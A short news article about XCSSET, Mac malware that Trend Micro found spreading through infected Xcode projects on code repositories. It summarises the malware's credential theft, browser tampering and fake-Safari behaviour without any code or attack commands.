Cybercriminals are corrupting Mac applications from source and contaminating benign open source projects with malware.
Running infected applications can direct users to dangerous websites, change the addresses of cryptocurrency wallets, take screenshots while browsing, and steal credit cards.
The malware also replaces Safari with a malicious version of Apple's browser, infects all other major browsers, steals usernames and passwords for Google, Apple ID, PayPal, Skype, Telegram, Evernote, WeChat, or install ransomware.
To protect yourself, make sure you are running the best Mac antivirus software. Also, for the time being, only install apps from Apple's App Store.
Trend Micro, the antivirus maker that discovered the malware, called it a "rabbit hole of malicious payloads" in a blog post last week.
The malware, which Trend Micro calls XCSSET, once complete, profiles the system and infects any version of Brave, Firefox, Opera, 360, and Yandex browsers that may be installed. If Google Chrome is installed, this malware replaces it with an older version of Chrome with weaker security.
However, this is nothing compared to what is done in Safari. The malware downloads and installs a malicious version of Safari so that internal links to the real Safari jump to the fake Safari.
"Functionally, this means that a fake Safari browser runs instead of the legitimate version of Safari," states a Trend Micro white paper on the XCSSET malware.
So far, Trend Micro has confirmed that XCSSET has infected two Mac open source projects; infection of iOS apps has not been confirmed.
If this sounds familiar, something similar has happened before: in 2015, a malicious version of Apple's development platform Xcode was distributed in China. As a result, Mac and iOS apps created with the corrupted version of Xcode became corrupted themselves. Apple promptly removed the tainted apps from its app store.
So why is it happening again? This time, the scammers are attacking a bit more downstream: instead of attacking Xcode itself, they are checking online code repositories such as GitHub.
"Malicious code is injected into a local Xcode project, and when the project is built, the malicious code is executed," Trend Micro said.
Unaware software developers release applications with their own legitimate signatures, so infected applications are not always stopped by Apple's own built-in security safeguards.
"Methods to verify distributed files (such as checking for hashes) are not helpful because developers are not aware that they are distributing malicious files," Trend Micro added.
Comments